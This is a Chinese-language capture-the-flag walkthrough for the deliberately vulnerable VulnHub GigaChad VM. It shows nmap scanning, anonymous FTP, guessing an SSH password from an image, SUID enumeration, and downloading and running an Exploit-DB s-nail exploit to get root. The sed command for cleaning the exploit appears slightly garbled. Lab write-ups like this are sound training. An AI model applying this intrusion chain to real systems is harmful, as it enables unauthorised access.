前言
大家好,我是Leon-pi,可以叫我pipi,新人报道,是个菜鸟,由于个人也是在学习过程中,文章写的也不是面面俱到,尽善尽美,请见谅。
靶机介绍
代码语言:javascript复制靶机地址:http://www.vulnhub.com/entry/gigachad-1,657/
靶机难度:简单
靶机目标:get flag开整
一、虚拟机无法分配IP处理办法
1 进入下面界面按 e
2 如下图所示进行修改,然后重启(F10)
代码语言:javascript复制rw signie init=/bin/bash
3 输入ip add 查看ip状态:
4 编辑网卡配置文件,配置文件修改如下:
代码语言:javascript复制vi /etc/network/interfaces
5 重启网络服务
代码语言:javascript复制/etc/init.d/networking restart
6 查看ip状态
这里看到已经分配到 IP 了,重启虚拟机,开搞!
二、靶机复现
1 探测靶机的IP地址,使用 nmap 快速扫描 C 段
代码语言:javascript复制nmap -sn -v -n -PE 192.168.154.0/24 --min-rate=2000得到靶机ip:192.168.154.178 ,此时我们进行端口探测2 端口探测
代码语言:javascript复制nmap -sC -sV -p- -n -vv 192.168.154.178 --min-rate=2000发现开放 21,22,80端口(ftp,ssh,http)
发现有 robots.txt文件,ftp允许匿名登录
3 浏览器访问80端口
4 并没发现什么有用的信息,查看网页源代码,发现加密,进行解密
5 我丢,被骂了,不过还好,还是有收获,得到字符串VIRGIN【处女】(意外发现跟首页一模一样有木有),添加到路径尝试访问一下,提示not found,改为小写继续访问
6 啧啧!!激动的心,颤抖的手,赶紧访问一下~
额,还是他这个大脑袋~,没什么用,那就瞅瞅 robots文件吧...
7 访问 robots 文件
8 此地无银三百两,进去溜一眼,就一眼~
我丢,这个憨憨竟然给军情处打电话了,MI5(英国军情5处),MI6(英国军情6处),难道暴露了!!!
8 是时候祭出扫描器扫一波了,额····没有什么有用的信息。
9 换个思路,ftp匿名(Anonymous)走起,发现有个文件
10 将文件下载回来,用记事本打开,发现 PK 头,文件类型为 rar
代码语言:javascript复制
11 改后缀为 rar 文件,打开发现是文本文件
得到 用户名为chad,看来密码就在那个图片中了,哎呀看到光明了,冲冲冲~
12 访问图片地址:/drippinchad.png
13 根据图片提示密码就是该建筑名称,百度识图整一波,gogogo~
14 得知该建筑为女儿塔,百度其英文名:
15 Maiden's Tower 尝试用此密码登录ssh发现失败,后来尝试了几种组合发现密码为 maidenstower,成功连接ssh:
代码语言:javascript复制ssh chad@192.168.154.178
16 发现是个低权限账户(目测要提权),先来瞅瞅文件吧,拿到1/2flag。
17 拿到低权限的shell后经常做的几件事:
代码语言:javascript复制1、看系统发行版本 lsb_release -a
2、查看内核版本 uname -a
3、当前用户权限
4、列举suid文件(找到高权限执行的程序) find / -perm -u=s 2>/dev/null
5、查看已经安装的包、运行的服务,过期版本可能会存在漏洞18 查看系统的发行版本,内核版本,并未发现漏洞,对不起打扰了。
19 尝试使用suid提权,查看设置了 suid的程序:
代码语言:javascript复制find / -perm -u=s -type f 2>/dev/null
.
20 发现s-nail,尝试利用该程序提权(为什么选择该程序?别问,爱过!)Exploit-db 找下漏洞EXP
21 将EXP拷贝到靶机中,并赋予执行权限
1 exploit-db 下载 EXP
下载 EXP 命令:
代码语言:javascript复制wget https://www.exploit-db.com/download/47172修改脚本去掉无用回车符号
代码语言:javascript复制sed -i "s/r//" 447172赋予 EXP 可执行权限
22 执行 EXP成功提权(这里可能会失败,多试几次就可)
23 在root桌面找到第二个flag
23 彩蛋--得知真实身份为 ERDAL KOMURCU
结语:
本人菜弟弟一个,大佬勿喷,谢谢
